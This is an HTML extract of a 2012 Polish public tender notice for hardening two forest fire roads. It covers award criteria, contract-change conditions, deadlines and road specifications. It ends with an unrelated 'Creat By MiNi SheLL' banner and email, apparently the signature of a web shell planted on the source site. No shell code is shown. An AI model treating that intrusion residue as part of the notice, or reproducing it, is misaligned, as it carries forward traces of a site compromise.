<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmiany postanowień Umowy w sytuacji zaistnienia jednej lub kilku z poniższych okoliczności :
1)	konieczności wprowadzenia zmian w Dokumentacji projektowej lub Specyfikacjach technicznych wykonania i odbioru robót budowlanych, będących podstawą realizacji przedmiotu Umowy, wywołanych zmianami w przepisach prawa, normach i standardach, zmianami w wiedzy technicznej lub zmianą funkcji użytkowej, oraz w przypadku stwierdzenia niezinwentaryzowanych elementów infrastruktury;
2)	konieczności wprowadzenia zmian w sposobie wykonania robót budowlanych spowodowanych zmianami w przepisach prawa, norm i standardów lub zmianami w wiedzy technicznej lub zmianą funkcji użytkowej oraz w przypadku stwierdzenia niezinwentaryzowanych elementów infrastruktury;
3)	konieczności zmiany terminu realizacji spowodowanej:
a)	wystąpieniem warunków pogodowych mających wpływ na brak możliwości prowadzenia robót budowlanych, np.: długotrwałe intensywne opady trwające powyżej 7 dni, powódź powodująca konieczność przerwania robót na czas niezbędny na osuszenie zalanego terenu do momentu, w którym możliwa jest kontynuacja lub rozpoczęcie robót, itp.;
b)	okolicznościami, których nie można było przewidzieć w chwili zawarcia Umowy, takich jak: siła wyższa, kolizje transportowe lub komunikacyjne itp. - powodujące zniszczenia lub uszkodzenia wymagające naprawy, a także związane z odkryciem w gruncie przedmiotów niemożliwych wcześniej do zidentyfikowania takich jak: głazy narzutowe, niewybuchy, przedmioty wymagające ochrony Konserwatora Zabytków itp.;
c)	okolicznościami leżącymi po stronie Zmawiającego;
Zmiany, o których mowa powyżej nie mogą powodować wykroczenia poza określenie przedmiotu zamówienia zawarte w Umowie jak również nie mogą powodować obejścia przepisu art. 144 Pzp.
Wszystkie zmiany postanowień zawartej umowy wymagają zgody obu Stron i zachowania formy pisemnej, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_warszawa/nadl_lochow/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba zamawiającego, pokój nr 22 /I piętro/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2012 godzina 09:00, miejsce: Siedziba Zamawiającego, w pokoju nr 16 - Sekretariat /parter/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> utwardzenie nawierzchni drogi leśnej wewnętrznej pożarowej nr 42 związanej z produkcją leśną o długości 1+655 km w oddziałach nr: 177, 176, 175, 174, 169; działki nr 221, 220, 215, 219, 218,213;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestawienie podstawowych parametrów drogi leśnej wewnętrznej pożarowej nr 42 związanej z produkcją leśną o długości 1+655 km: - długość całkowita drogi - 1655.0 m , powierzchnia z mijankami i zjazdami = 303,75+1270,0+8083.0= 9656.75 m2, - od km 0+000 do km 1+185 szer. nawierzchni z poboczami - 5.0 m, - od km 1+185 do km 1+655 szer. nawierzchni z poboczami - 4.5 m, - od km 0+000 do km 1+368 , nawierzchnia z kamienia łamanego 0/31.5 mm gr 15 cm po zagęszczeniu na warstwie odcinającej z pospółki żwirowej gr 15 cm po zagęszczeniu, - od km 1+368 do km 1+655 nasyp poszerzony do 5.4 m , nawierzchnia z kamienia łamanego 0/31.5 mm gr 15 cm po zagęszczeniu , na geokracie gr 15 cm wypełnionej pospółką żwirową odciętej od podłoża geowłókniną, - od km 0+000 do km 0+120 nasyp z piasku o zmiennej grubości od 0 do 1.2m, - dł. rowów istniejących 1423.0 m, - dł. rowów projektowanych - 1247.0 m, - przepust dn. 400 mm z rur strukturalnych w km 0+723 dł. 6.0 m i w km 1+460 dł. 6.0 m, w km 1+540 istniejący przepust na którym należy wykonać ścianki czołowe, - mijanka lewa szer. 7.5 m z poboczami w km 0+445 i 0+950, mijanka prawa w km 1+362.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.23-7, 45.23.32.20-7, 45.23.31.42-6, 45.10.00.00-8, 45.23.11.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> utwardzenie nawierzchni drogi leśnej wewnętrznej pożarowej nr 22 związanej z produkcją leśną o długości 2+240 km w oddziałach nr: 119, 118, 129, 139
 działki nr 673, 674, 678,683..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestawienie podstawowych parametrów drogi leśnej wewnętrznej pożarowej nr 22 związanej z produkcją leśną o długości 2+240 km: - długość całkowita drogi - 2240.0 m , powierzchnia z mijankami , zjazdami i poszerzeniami na łukach = 526.5 +876.8 + 136.52 + 11200 = 12739.82 m2, - od km 0+000 do km 2+240 szer. nawierzchni z poboczami - 5.0 m, - od km 0+000 do km 2+240 , nawierzchnia z kamienia łamanego 0/31.5 mm gr 15 cm po zagęszczeniu na warstwie odcinającej z pospółki żwirowej gr 15 cm po zagęszczeniu, - od km 0+430 do km 0+512 i od km 0+728 do 1+375 geokrata gr 15 cm wypełniona kruszywem i warstwa separacyjna z geowłókniny - 2754.88 m2, - od km 1+595do km 1+658 droga w przekopie, - od km 1+658 do km 2+127 droga w nasypie, - dł. rowów istniejących 1011.00 m, - dł. rowów projektowanych - 340.0 m, - mijanki lewa szer. 7.5 m z poboczami w km 0+300 , 0+677, km 1+505, - mijanka prawa szer. 7.5m z poboczami w km 1+100, km 1+924.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.23-7, 45.23.32.20-7, 45.23.31.42-6, 45.10.00.00-8, 45.23.11.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com